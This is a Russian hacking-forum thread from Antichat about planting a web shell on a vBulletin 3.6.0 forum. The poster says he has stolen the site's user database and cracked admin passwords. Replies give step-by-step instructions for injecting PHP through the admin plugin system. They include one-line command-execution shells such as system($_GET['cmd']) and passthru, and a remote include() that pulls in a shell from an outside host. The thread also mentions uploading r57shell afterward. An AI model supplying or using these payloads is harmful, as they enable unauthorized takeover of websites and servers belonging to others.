ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Как залить шелл в vBulletin v3.6.0?
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Как залить шелл в vBulletin v3.6.0?
  #1  
Старый 23.08.2006, 14:32
Аватар для Elenberg
Elenberg
Новичок
Регистрация: 05.07.2006
Сообщений: 23
Провел на форуме:
92773

Репутация: 1
Отправить сообщение для Elenberg с помощью ICQ
Question Как залить шелл в vBulletin v3.6.0?
Вобщем, есть форум где стоит булка версии 3.6.0.
Админ ище настраивает и пока не почитстил install.
Т.е. пример: http://target.ru/forum/install/upgrade_301.php?step=бла бла бла
Скомуниздил БД юзров, подобрал пасы.
Имею доступ к админке но залить шелл ни как не выходит.
Приведеные способы на форуме не работают
Кто знает как подскажите плизз с меня репа.
 
Ответить с цитированием

  #2  
Старый 23.08.2006, 15:45
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию
поиск юзай ) в шаблоны можно пшп код вставлять
если что - стучи, 236662256
 
Ответить с цитированием

  #3  
Старый 23.08.2006, 16:00
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
Попробуй так

Цитата:
Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
__________________
 
Ответить с цитированием

  #4  
Старый 23.08.2006, 21:32
Аватар для Elenberg
Elenberg
Новичок
Регистрация: 05.07.2006
Сообщений: 23
Провел на форуме:
92773

Репутация: 1
Отправить сообщение для Elenberg с помощью ICQ
По умолчанию
Люди вы издеваетесь
Я ведь написал что все приведеные способы на форуме не работают нужно что то новинькое а гугле пабликов на v3.6.0 нету ничего
Мож кто знает что то новенькое?
 
Ответить с цитированием

  #5  
Старый 23.08.2006, 21:48
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию
Цитата:
Сообщение от Elenberg  
Люди вы издеваетесь
Я ведь написал что все приведеные способы на форуме не работают нужно что то новинькое а гугле пабликов на v3.6.0 нету ничего
Мож кто знает что то новенькое?
щас свой форум обновлю... попробую шелл залить
через модули 99% наверняка можно залить ИМХО
 
Ответить с цитированием

  #6  
Старый 23.08.2006, 23:21
Аватар для Elenberg
Elenberg
Новичок
Регистрация: 05.07.2006
Сообщений: 23
Провел на форуме:
92773

Репутация: 1
Отправить сообщение для Elenberg с помощью ICQ
По умолчанию
Может и можна но миниатюрный там ограничение на размер стоит.
При впаривании туда r57shell выдается эго верхняя панель только, та где инфа по серверу.
Тут ужно что то другое искать.
 
Ответить с цитированием

  #7  
Старый 23.08.2006, 23:46
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
а ты не знал что кроме рст есть например <?system($c);?> и усе, ну разве что подделать немного <?system($_GET['c']);?>, а если вообще красиво
<?

if (!empty($_GET['cmd'])) {
echo '<pre>';
system($_GET['cmd']);
echo '</pre>';
exit;
}

?>

или если есть корявая настройка в php - allow_url_fopen=On, то <? include('http://путь_к_шеллу_рст_без_счетчи ов_нах.txt') ?>
 
Ответить с цитированием

  #8  
Старый 24.08.2006, 01:34
Аватар для Elenberg
Elenberg
Новичок
Регистрация: 05.07.2006
Сообщений: 23
Провел на форуме:
92773

Репутация: 1
Отправить сообщение для Elenberg с помощью ICQ
По умолчанию
Спасибо max_pain что откликнулся, но даже таким макаром ничего незалить на серв уже пробывал.
Нада не через модули наверно или через другие
Сижу все подряд проверяю
Последний раз редактировалось Elenberg; 24.08.2006 в 01:43..
 
Ответить с цитированием

  #9  
Старый 09.07.2008, 21:28
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
Elenberg
почему нече нельзя залить?
через модули вписываеш <? passthru($cmd) ?>
получаеш доступ в CMD смотриш папки с правами и потом уже заливаеш r57.
 
Ответить с цитированием

Проблемы с шеллом
  #10  
Старый 25.07.2008, 05:29
Аватар для Угрюмый
Угрюмый
Новичок
Регистрация: 03.09.2006
Сообщений: 16
Провел на форуме:
226790

Репутация: 8
По умолчанию Проблемы с шеллом
У меня та же проблема с шеллом.
Заливаю в vB 3.5.4 через модули <?system($_GET['c']);?>
но при обращении к www.xz.сom/forumpath/faq.php?cmd=dir
вместо листинга открывается страница с ФАК-ом.
Кто что посоветует?
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть доступ к админке инвижин 2.* Как залить шелл? Fr13nd Форумы 3 06.07.2006 21:05
Как залить шелл через PhPBB SheFF Форумы 5 29.11.2004 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ